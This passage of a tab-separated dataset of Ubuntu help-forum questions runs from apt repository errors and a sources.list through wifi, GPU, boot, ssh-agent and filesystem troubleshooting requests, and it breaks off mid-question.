ign http : //extras.ubuntu.com maverick/main i386 packages ign http : //archive.ubuntu.com maverick-security/restricted sources ign http : //archive.ubuntu.com maverick-security/universe sources ign http : //archive.ubuntu.com maverick-security/multiverse sources ign http : //toolbelt.heroku.com ./ packages err http : //extras.ubuntu.com maverick/main sources 404 not found ign http : //archive.ubuntu.com maverick-security/main i386 packages ign http : //archive.ubuntu.com maverick-security/restricted i386 packages ign http : //archive.ubuntu.com maverick-security/universe i386 packages ign http : //archive.ubuntu.com maverick-security/multiverse i386 packages err http : //archive.ubuntu.com maverick/main sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick/restricted sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick/universe sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick/multiverse sources 404 not found [ ip : 91.189.92.202 80 ] err http : //extras.ubuntu.com maverick/main i386 packages 404 not found err http : //archive.ubuntu.com maverick/main i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick/restricted i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick/universe i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick/multiverse i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-updates/main sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-updates/restricted sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-updates/universe sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-updates/multiverse sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-updates/main i386 packages 404 not found [ ip : 91.189.92.202 80 ] hit http : //toolbelt.heroku.com ./ packages err http : //archive.ubuntu.com maverick-updates/restricted i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-updates/universe i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-updates/multiverse i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-security/main sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-security/restricted sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-security/universe sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-security/multiverse sources 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-security/main i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-security/restricted i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-security/universe i386 packages 404 not found [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com maverick-security/multiverse i386 packages 404 not found [ ip : 91.189.92.202 80 ] fetched 317b in 11s ( 28b/s ) here is the source_list # deb cdrom : [ ubuntu 10.10 _maverick meerkat_ - release i386 ( 20101007 ) ] / maverick main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # deb cdrom : [ debian gnu/linux 5.0.0 _lenny_ - official i386 dvd binary-1 20090214-16:54 ] / lenny contrib main deb http : //archive.ubuntu.com/ubuntu maverick main restricted deb-src http : //archive.ubuntu.com/ubuntu maverick main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu maverick-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu maverick-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu maverick universe deb-src http : //archive.ubuntu.com/ubuntu maverick universe deb http : //archive.ubuntu.com/ubuntu maverick-updates universe deb-src http : //archive.ubuntu.com/ubuntu maverick-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu maverick multiverse deb-src http : //archive.ubuntu.com/ubuntu maverick multiverse deb http : //archive.ubuntu.com/ubuntu maverick-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu maverick-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //in.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # deb-src http : //in.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu maverick partner deb-src http : //archive.canonical.com/ubuntu maverick partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu maverick main # deb-src http : //extras.ubuntu.com/ubuntu maverick main deb http : //archive.ubuntu.com/ubuntu maverick-security main restricted deb-src http : //archive.ubuntu.com/ubuntu maverick-security main restricted deb http : //archive.ubuntu.com/ubuntu maverick-security universe deb-src http : //archive.ubuntu.com/ubuntu maverick-security universe deb http : //archive.ubuntu.com/ubuntu maverick-security multiverse deb-src http : //archive.ubuntu.com/ubuntu maverick-security multiverse deb http : //ppa.launchpad.net/fkrull/deadsnakes/ubuntu maverick main deb-src http : //ppa.launchpad.net/fkrull/deadsnakes/ubuntu maverick main
249031	google drive / owncloud alternative for ubuntu	i am looking for an alternative of google drives that works/installs in ubuntu server . something similar that offers the same or most of the functions in google drive , like file upload , syncing , sharing files , etc.. note that i am not looking for a client to connect to google drive like grive . i am looking for a server or service that can be installed in ubuntu server and that it resembles the way google drive works with documents and user groups . for better understanding of what i am looking for , we can see http : //owncloud.org/ which has options like calendar , events , contacts and other stuff that anybody that has used google drive for documents will know .
249034	working with window 7 files	i just installed ubuntu 12.04 yesterday with a dual boot with windows 7 . i did a full ubuntu install ( not wubi ) . i have just noticed that i can mount my files from windows 7 when i am booted to ubuntu 12.04 . i was wondering if i can work with my user windows 7 files when i am in ubuntu i know how picky windows is and i dont want to mess anything up by accessing the window files when i am not booted to window . thank you
249037	facebook does n't work in ubuntu 12.10	since two days i ca n't connect to facebook any more . all other pages work . i tried it from firefox as well as from chromium ( both on ubuntu 12.10 ) . the strange thing is , that it is working on windows . i also already changed the mtu to 1492 . i run curl , too : * about to connect ( ) to facebook.com port 80 ( # 0 ) * trying 66.220.152.19 ... * connected * connected to facebook.com ( 66.220.152.19 ) port 80 ( # 0 ) > get / http/1.1 > user-agent : curl/7.27.0 > host : facebook.com > accept : */* > * additional stuff not fine transfer.c:1037 : 0 0 * http 1.1 or later with persistent connection , pipelining supported < http/1.1 302 found < location : https : //facebook.com/ < content-type : text/html ; charset=utf-8 < x-fb-debug : nvdza4r/gf2tdj/80qdgq5vv2om8kyerdz2zm9mwdxm= < date : tue , 29 jan 2013 16:24:50 gmt < connection : keep-alive < content-length : 0 < * connection # 0 to host facebook.com left intact * closing connection # 0 has anybody an idea , what it could be ? thank you !
249038	optirun glxgears : can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected	i have problem with optirun command on ubuntu 12.10 installed on notebook dell m6600 . in the bios i have enabled optimus technology . i have two graphics : lspci -vnn | grep '\ '' [ 030 [ 02 ] \ ] ' intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0126 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) nvidia corporation gf104 [ quadro 4000m ] [ 10de:0e3b ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) i have installed nvidia drivers : dpkg -l | grep nvidia ii boinc-nvidia-cuda 7.0.27+dfsg-5ubuntu0.12.04.1 amd64 metapackage for cuda-savvy boinc client and manager ii bumblebee-nvidia 3.0.1-3~quantalppa2 amd64 nvidia optimus support using the proprietary nvidia driver ii nvidia-common 1:0.2.71.1 amd64 transitional package for ubuntu-drivers-common ii nvidia-cuda-doc 4.2.9-1ubuntu1 all nvidia cuda and opencl documentation ii nvidia-cuda-gdb 4.2.9-1ubuntu1 amd64 nvidia cuda gdb rc nvidia-current 304.64-0ubuntu1~quantal~xup1 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-experimental-310 310.14-0ubuntu1 amd64 experimental nvidia binary xorg driver , kernel module and vdpau library rc nvidia-settings 304.64-0ubuntu1~quantal~xup1 amd64 tool for configuring the nvidia graphics driver rc nvidia-settings-experimental-310 310.14-0ubuntu1 amd64 tool for configuring the nvidia graphics driver ii nvidia-settings-updates 304.51-0ubuntu2 amd64 tool for configuring the nvidia graphics driver when i try this : optirun -vv -debug glxspheres i got : [ 912.342326 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 912.497379 ] [ debug ] optirun version 3.0.1 starting ... [ 912.497472 ] [ debug ] active configuration : [ 912.497560 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 912.497600 ] [ debug ] x display : ebug [ 912.497660 ] [ debug ] ld_library_path : [ 912.497694 ] [ debug ] socket path : /var/run/bumblebee.socket [ 912.497724 ] [ debug ] vgl compression : proxy [ 912.734313 ] [ info ] response : no - error : [ xorg ] ( ee ) no devices detected . [ 912.734376 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 912.734399 ] [ debug ] socket closed . [ 912.734447 ] [ error ] aborting because fallback start is disabled . [ 912.734477 ] [ debug ] killing all remaining processes .
249044	unintsallation ubuntu	i am new to ubuntu . i have installed it using windows ubuntu installer . at first it worked well.but i have committed mistake while working in quantum espresso software , linux is required plat form for it . this mistake erased my ubuntu . while i restart my pc there are two os option to select one is windows and another one is ubuntu . when i tried to boot ubuntu it shows that ubuntu is erased . so i installed ubuntu once more.but now problem is when i restart pc it shows three os list now these are one windows and two ubuntu and i can boot both the ubuntu . so my question is how to erase old all ubuntu and install new one please help in this reg. , thank you
249046	can i use the < video > tag to stream videos stored on ubuntu one ?	i have a few videos on ubuntu one cloud web storage and want to play that videos on my blog using html tag without downloading . because my friend wants to see them withut downloading . when i enter the video url in firefox address bar the video stream 's and played , but when i use the < video > tag it gives me an error : contains mime type is not found ! any body have an idea to play directly ubuntu one videos in my blog page ? thank's
249057	installing windows 7 after ubuntu 12.10	i have installed ubuntu . i want to install windows 7 so it will not hurt my ubuntu installation . i know i can install ubuntu inside windows . but i do n't know how to install windows after installing ubuntu .
249058	how do i set up netgear wireless connection in linux ubuntu 12.04	i have an ethernet connection to get on the internet but my building is all wifi . i have a desktop pc that is wired . i dont have a router . i have only a linux o.s . and no windows . it was installed when i got the machine . i want to use only the wireless connection . i have a netgear adaptor wna1100 and i am in linux ubuntu version 12.04 . what packages do i install or what drivers do i need ? at & t sent me a cd with windows files that wont work . i had version 10.04 but was told it was too old for the adaptor so i just upgraded to 12.04 and cant find anything but will try . i havent found the synaptic pkg manager yet .
249064	connection information is telling me what ?	in particular the speed figure , the rest being quite obvious . for my wireless connection the speed value is up and down between 1 mb/s and 54 mb/s . i 've always taken this to be a measure of how strong and reliable the connection between laptop and wap is . however , i find it recently varying wildly when i 'm stationary and close to the wap/router . question , does this suggest a hardware problem ? hope this is n't considered off topic .
249065	how can i regain internet access ? ( lost after power outage )	following a power outage in the neighbourhood two days ago , i restarted my computer and everything seemed fine . however , i can not access the internet anymore . the computer is a desktop and is connected to the web using a wired connection . i tried reinstalling the network from the recovery menu in grub and selecting `` network '' `` enable networking '' , but when i do this fsck starts and simply stalls . any other way for me to re-enable networking ? thanks
249066	error mounting partition	i have a samsung laptop which received a bump yesterday . after that , the system does n't load the windows ( vista ) , the screen remains black , does n't boot . i burn a livecd with ubuntu to try to back up my data , but was unsuccessful . my hard drive has two partitions : the main ( c : ) which has windows and all my documents , and one another ( d : ) which i have some documents and files . this partition ( d : ) is right , i can mount it . i did a back up that files were there , really i want to recover 2 folders ( 30 mb , no more ) . but i really want to do back up some folders which are in c : partition , but when a i try to mount i receive the message : error mounting /dev/sda2 at /media/ubuntu/c06e17086e16f6be : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/ubuntu/c06e17086e16f6be '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . and now , i do not know how to proceed . please , does somebody know how to do ?
249068	cluster network setup	after exhaustively searching on google and other locations , i still need some direction or primer on setting up the network i 'm aiming for . i have a cluster of machines networked via ssh using external static ips . what i want to do is localise the network and only have one external node that all the other machines route through to access the internet ( and conversely , externally access the other nodes via ssh through this one machine ) . this is set up on a university network , so we do n't have an internal network router , only a switch ( netgear gs748t ) . is it possible to use the switch to set up a local network ( using say 192.168.x.x addressing ) and then route through one machine to the external network ? and if so , how is this set up and managed ? the main reason for the switch is because we 're entirely dependent on the external network being up for parallelisation -- if the university network drops for any reason , we lose the cluster connectivity . not being a typical set up , i 've found it difficult to find guides to get off the ground . as such , any help or suggestions of where to direct my search would be appreciated .
249080	why ca n't i create a wi-fi hotspot with ubuntu 11.10	i was able to create a wi-fi hotspot using connectify in windows but once i switched to ubuntu i am no longer able to do the same . my dell studio xps 1640 that runs ubuntu asks me the password of the hotspot i just created using the system setting - > networking - > wireless - > create hotspot . lshw -c network warning : you should run this program as super-user . *-network description : wireless interface product : bcm43224 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 01 serial : 0c:60:76:6f:7f:71 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.0.0-30-generic firmware=n/a latency=0 multicast=yes wireless=ieee 802.11abgn resources : irq:17 memory : f8000000-f8003fff *-network description : ethernet interface product : netlink bcm5784m gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 10 serial : 00:26 : b9:11:50 : db size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.119 duplex=full firmware=sb v2.17 ip=83.172.121.99 latency=0 multicast=yes port=twisted pair speed=1gbit/s resources : irq:48 memory : fc000000-fc00ffff warning : output may be incomplete or inaccurate , you should run this program as super-user . the above is the configurations of my network cards . that is the result that i got when i typed the following command lshw -c network .
249081	restoring gcc and g++ flags	i 've recently done something really stupid : i wanted to configure netcdf libraries using the intel fortran compiler and , therefore , i was following instructions for that kind of procedure . unfortunately , i 've skipped a paragraph and i also accidentally changed my gcc and g++ flags without realizing , since i wrote these lines : $ export cc=icc $ export cxx=icpc $ export cflags='-o3 -xt -ip -no-prec-div -static ' $ export cxxflags='-o3 -xt -ip -no-prec-div -static ' $ export cpp='icc -e ' $ export cxxcpp='icpc -e' the problem is that i do not have the intel c and c++ compiler ( i.e . : icc and icpc ) and now , everytime i try to configure netcdf libraries i end up with a gcc sanity check error . how can i restore cc , cxx , cflags , cxxflags , cpp and cxxcpp to a clean gcc , g++ configuration ?
249082	why ca n't i install lib32gcc1 ?	i 'm trying to install source dedicated server on ubuntu server 12.04 and every time i try to install lib32gcc1 , i get e : package 'lib32gcc1 ' has no installation candidate is there anything i can do to fix this ? i have tried running sudo apt-get update and the error persists . apt-cache policy lib32gcc1 lib32gcc1 : installed : ( none ) candidate : ( none ) version table : grep -r ^deb\ . *main /etc/apt/sources.list* /etc/apt/sources.list : deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted /etc/apt/sources.list : deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted /etc/apt/sources.list : deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse /etc/apt/sources.list : deb http : //security.ubuntu.com/ubuntu precise-security main restricted /etc/apt/sources.list : deb http : //extras.ubuntu.com/ubuntu precise main as i was able to install the openssh-server package , here is the version table for that package : apt-cache policy openssh-server openssh-server : installed : 1:5.9p1-5ubuntu1 candidate : 1:5.9p1-5ubuntu1 version table : *** 1:5.9p1-5ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main i386 packages 100 /var/lib/dpkg/status
249087	trouble installing skype	some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin but it is not installable e : unable to correct problems , you have held broken packages . that is the error message i receive when i try to install skype with terminal . synaptics gives an error message about fixing broken something or other and when i click fix it it gives another error . can anyone help me ? i tried deb package . this loads ubuntu software center for me which is a major no no . it lags and crashes my system constantly and i have no problem using synaptic for installing most programs but says broken package for skype and errors when attempting to fix it . i have tried every way i can think of it to get anything to work and nothing will . just downloaded ubuntu 12.04 or whatever and i 'll settle for any working version of skype just help me .
249088	ubuntu 12.10 64bit not booting	a serious issue cropped up just now , i removed my 32bit 12.04 and installed 12.10 64bit version . i followed creating an efi partition given at uefi now my system wont boot without my bootable usb stick connected.. it automatically goes into press f12 to enter boot menu mode without the usb stick with the usb connected i get this boot screen , with one extra option saying install ubuntu oem ( for manufacturers only ) again same uefi link as above ubuntu is installed fine as i can see the 3 partitions i created while installing uefi boot partition , / and /home and also this confirms that i have ubuntu 12.10 and windows 7 and the following image shows the partitions i have , i have made a mistake by creating 2 swaps , i 'll rectify it later here 's my fstab entries /etc/fstab the output from bootrepair : what 's going wrong where ? ? please help me.. fyi : i also tried to install 64bit 12.04 when it released , but had problems of windows not being listed in grub bootloader .
249089	monodevelop , `` no such file or directory '' when trying to run a program	i wanted to try to write a c++ program in `` monodevelop '' and i use ubuntu 12.10 as a os . but when i finish writing my program ( any program ) and want to actually run my program , i get this error : bash : /home/username/c++ : no such file or directory press any key to continue ... that `` c++ '' in `` /home/username/c++ '' is supposed to be the name of the folder which i wanted to build my project in it and it 's name is `` c++ projects '' now i understand it is because of the space that is between `` c++ '' and `` projects '' , so my question is , is there a way that i can build and run my program in a directory that has a space inside it 's name ? now i tried writing the same program in `` code : :blocks '' and have had no problem . i understand i will have the same `` no such file or directory '' error if i try to go to a directory that has a space in it 's name in the terminal , and it is pretty annoying that i ca n't have my program ran in the directory that i want it to run . some help would be appreciated .
249096	no wifi in 12.10 broadcom bcm4313 samsung rf511	well my wireless card worked just after install , and after a reboot no wireless card was detected , so i ca n't connect wirelessly . the results of lspci -nn are : 01:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) and here is iwconfig : eth0 no wireless extensions . lo no wireless extensions . rfkill list all : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : samsung-wlan : wireless lan soft blocked : no hard blocked : no 2 : samsung-bluetooth : bluetooth soft blocked : no hard blocked : no lsmod : module size used by parport_pc 32689 0 ppdev 17074 0 rfcomm 46620 12 bnep 18141 2 ext2 72881 1 snd_hda_codec_hdmi 32049 1 snd_hda_codec_realtek 78048 1 coretemp 13401 0 kvm_intel 132760 0 kvm 414071 1 kvm_intel ghash_clmulni_intel 13221 0 aesni_intel 51038 0 cryptd 20404 2 ghash_clmulni_intel , aesni_intel aes_x86_64 17256 1 aesni_intel snd_hda_intel 33492 3 snd_hda_codec 134213 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17699 1 snd_hda_codec snd_pcm 96668 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30513 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61555 2 snd_seq_midi , snd_seq_midi_event snd_timer 29426 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq i915 520621 3 drm_kms_helper 49113 1 i915 drm 288721 4 i915 , drm_kms_helper i2c_algo_bit 13414 1 i915 psmouse 95595 0 snd 78921 16 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device btusb 22475 0 uvcvideo 76750 0 videobuf2_core 32852 1 uvcvideo soundcore 15048 1 snd videodev 120310 2 uvcvideo , videobuf2_core videobuf2_vmalloc 12861 1 uvcvideo samsung_laptop 14533 0 serio_raw 13216 0 mei 40691 0 bluetooth 209249 22 rfcomm , bnep , btusb videobuf2_memops 13405 1 videobuf2_vmalloc video 19336 2 i915 , samsung_laptop lpc_ich 17062 0 microcode 22804 0 joydev 17458 0 mac_hid 13206 0 snd_page_alloc 18485 2 snd_hda_intel , snd_pcm lp 17760 0 parport 46346 3 parport_pc , ppdev , lp hid_generic 12541 0 usbhid 46987 0 hid 100411 2 hid_generic , usbhid uas 17845 0 usb_storage 48839 0 r8169 61651 0 i 'm not sure what all of the above means , but it was posted to help solve another wireless card issue so i thought it would be helpful to post it here . any help in getting my wireless working would be greatly appreicated ! : )
249098	how do i run eclipse as sudo	i 've read that it 's bad to run gui applications from a terminal using sudo . in order to administer some eclipse updates , i need elevated privileges ( view screenshot ) . how do i do this correctly ?
249099	offline file & document management system ?	i 'm searching for a private document management system . it should have the following features : storage of files on my harddrive organizing in human readable folder structure ( i want to open files in oo etc . without the management system ) automatic indexing of openoffice , ms word and pdf files with full-text-search possibility of adding tags and categories to different files it seems to me that i 'm searching for a kind of a database for archiving and indexing files i put in a folder ... ( without php , mysql and other software with may be abused by others ... . )
249102	can not setup 1 gbit ethernet connection	i 'm using kubuntu 12.10 . my router operate at 1gbit connection with my other pc , i have 1gbit ethernet card , cable is cat5e and ca n't setup 1gbit ethernet connection . only 100mbit/s . lspci|grep ethernet 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 01 ) sudo ethtool eth0 settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes speed : 100mb/s duplex : full port : twisted pair phyad : 0 transceiver : internal auto-negotiation : on mdi-x : unknown supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes kernel module for ethernet card is r8168 . what 's wrong ?
249108	should i install grub while upgrading ubuntu from 10.04 to 12.04 on a vps ?	i just purchased a vps running ubuntu 10.04 . during the installation , it asked if i would like to install grub . i actually do n't know if i want to install grub or not . i 'm afraid that i may mess something up with the provider . any suggestions ?
249111	what is the difference between ubuntu and linux ?	i was told that i should use ubuntu and linux for my programming endeavors . i 'm unclear about what each of them are . any tips or guidance ?
249113	how can i save settings when booting an iso file from hdd ?	i was looking for an easy way to manually save settings when booting from an iso-file in the hard disk with grub2 , and load them the next boot ; but maybe it would be easier to do a persistent boot that automatically restores the saved settings . the only info i have found talks about usb , complex tools or just ideas and plans but i have n't seen any solution . i guess this could be solved with a dedicated partition for the persistence or with a file in the same partition where the iso files resides . i would prefer the last one because the idea of repartitioning a hard disk on a macbook with refit and dual boot does n't thrill me . ... ... ... .. note : sadi 's solution is not working for me ( without the first line and the file=/cdrom/preseed/ubuntu.seed parameter ) . unfortunately , and according to other posts , there are many combinations possible : the casper-rw has to be on the root directory ? , does it have to be in a vfat partition ? the paramenters are persistent rw ? , is a paramenter persistent-path needed ? ... and so on . i can hardly believe there is not a single example that explains all this in a clear way .
249114	how can i install software without using dpkg or apt ?	since my catalogue was broken ( which thing is detailed here how do i repair my broken catalogue ? ) i have been unable to install software or update software . could somebody tell me a way of installing and updating software ( regardless of origin and package type so i can install any software i could before the catalogue broke ) despite my broken catalogue ?
249119	flash files do not play audio	i am running a laptop with ubuntu 12.10 , and while flash files will play their video , i have absolutely no audio with them . the problem was persistent when i was running 12.04 , and i thought upgrading the os would fix the problem , but it did not . other sounds play fine , such as mp3s , system sounds , speaker tests , etc . i 've installed flash using the apt-get install flashplugin-installer command , and everything went smoothly . i use firefox 18.0.1 .
249125	where does ubuntu tweak save the wallpaper ?	i guess the title says it all . i would like to save the pictures to my external drive to use it on my other os .
249127	how can i show deadbeaf music-player queue	how can i show deadbeaf music-player queue , deadbeafmusicplayer has the option to queue music files , but thtere seems no way to have this listed , like a playlist tab or so
249134	how to get my ssh passphrase remembered during a ubuntu session ?	if i open a gnome terminal and connect to a server through ssh , i am asked for my passphrase by a text prompt in my terminal instead of a gui , and , worse , this passphrase is not stored in memory for the duration of my ubuntu session . on the contrary , i use pgp keys with enigmail in thunderbird , and i have to enter my passphrases only once per session , using a gui . it seems i have 3 agents installed and running : seahorse-daemon , gpg-agent and ssh-agent , and they do not seem to play along nicely . i have a gnome-keyring running , too . i do not understand what each of these programs is supposed to do . ssh-agent is run by my system with `` /usr/bin/gpg-agent '' as first command argument , and i do not understand what this means . how can i set up which agent to use for ssh keys ?
249135	booting issues after crash during update	while automatically updating to the newest version of ubuntu , my laptop crashed ( i was watching youtube videos and the screen went to the desktop , could still hear the audio , but could not get anything to do anything ... the mouse arrow would not even move ) ... i hard rebooted the laptop and ever since it will only boot into a basic blue background with the one folder icon ( looks like a blank piece of paper with a corner folded over ) . my usb mouse is recognized , but the launch bar does not appear , and i can not get any programs to launch ( or even find any of them ) ... if i download ubuntu on to a usb flash drive and boot my computer with the flash drive plugged in , will it automatically load ubuntu again ? the laptop is a lenovo x200 that does not have a built in disk drive , i do have a usb cd/dvd drive ( the computer does not seem to recognize it when it is plugged in ) ... what can i do ?
249138	configuring a http and https web accelerator using varnish	i have installed and configured varnish on my new server . the server is currently working for http traffic . i would like to also forward ssl traffic to my webserver . it is not necessary to cache this traffic at this time . any suggestions ? thank you !
249139	why do i get `` failed to fetch [ ... ] hash sum mismatch '' errors during update ?	every time i try to update my system i get these messages : w : failed to fetch bzip2 : /var/lib/apt/lists/partial/it.archive.ubuntu.com_ubuntu_dists_precise-updates_universe_binary-amd64_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . i 'm using ubuntu 12.04 lts . i do n't understand what this message is about or what the problem is .
249145	playing steam games on from windows 7 ntfs parttion on ubuntu 12.10 ?	i have windows and ubuntu partitions on my laptop . i tried using wine to start steam . it actually works and may function fine . my only problem is when i try to start one of my games , some of them will start . the only game that works so far is team fortress 2 . the game is a bit slow and when you go to one the battle areas and stutters a little . is it because of the ntfs on my partition ? or is it because of my graphics card ? i have an icore3 cpu,4 gigs of ram , and a intel hd 3000 graphics card . is there some way to improve the performance ?
249150	what is kde , gtk , gtk+ , qt , and/or gnome ?	i 'm new to ubuntu ( and linux in general ) . some times when looking at programs in the ubuntu software center , i see things about the programs being 'for the gtk+ environment ' , or 'for gnome ' , or a whole lot of other things . all i know is that i 've got ubuntu 12.04 lts , and what i 'm seeing through my monitor appears to be the controversial unity interface . what are these other things i see mentioned in the descriptions of programs ( such as kde , gtk , qt , gnome , gnome 'shell ' , etc. ) ? are they linux guis that are alternatives to unity ? are they dependencies that i need to have ? i 've spent the last several months getting used to ubuntu in its present form ( though i confess , i have played around with compiz , which is fun as hell ) . will these other things completely turn my world upside down if i use them ?
249157	manually turn on cpu fan	my bios controls my fan speeds , and i want to keep it that way . i have a machine in my basement where it 's normally pretty cool , and as long as the machine is n't under high load the fans do n't need to run at all . the bios already handles this just fine . but if my fans are n't running , i have no way to test them to make sure they are n't broken . so i 'd like to make a script which will turn on the fans full blast for a few seconds , then use lm-sensors to monitor fan speed , and then i will know that the fans are n't broken . how can i manually turn on the fans to full speed ? i do n't want to use fancontrol , because i 'm not looking for something that keeps running and keeps controlling fan speed . i just want something `` low tech '' that will turn them on regardless of temperature . another thread said : if you really want to do it yourself , you can probably find special device files named pwm1 , pwm2 , etc . in /sys/class/hwmon/*/device/ . you can cat them to get the current value or write a number between 0 and 255 to change the fan speed . that would be perfect , but it does n't seem to work . fancontrol says that my cpu fan is /sys/devices/platform/it87.656/pwm3 , but when i set that to 255 , it does n't affect fan speed at all . does anyone know how i can manually turn on the fan from a script , regardless of temperature ?
249158	ext4 filesystem wrongly detected as jmicron_raid_member	i have an installation of ubuntu 12.04 on an ssd disk that i 'm unable to boot after a kernel upgrade and a reboot . additional things that might be a possible cause is that i did some cleanup ( dpkg -r ) of old unused kernels ( a list that i selected manually from dpkg -l | grep linux- ) . the following is what i can gather from booting a live system ( that is , boot another operating system ) and trying to access the disk . the disk has two partitions , the first one is a small partition ( sdb1 ) containing a /boot ext2 filesystem , and the second is luks encrypted , so i have opened it up using cryptsetup luksopen /dev/sdb5 ssd . the new device is an lvm2 pv so i make that available with vgscan and then vgchange -a y . now i have one lvm2 vg containing two logical volumes named foo-root and foo-swap . it is foo-root that contains my filesystem . now is when weird things start to happen . i try to mount the filesystem with mount /dev/mapper/foo-root /mnt which returns : mount : unknown filesystem type 'jmicron_raid_member' so i try to specify the filesystem type mount -t ext4 /dev/mapper/foo-root /mnt , and that works . i am happy to be able to access my data , but since i still can not boot the disk i unmount the filesystem and continue exploring . i run fsck.ext4 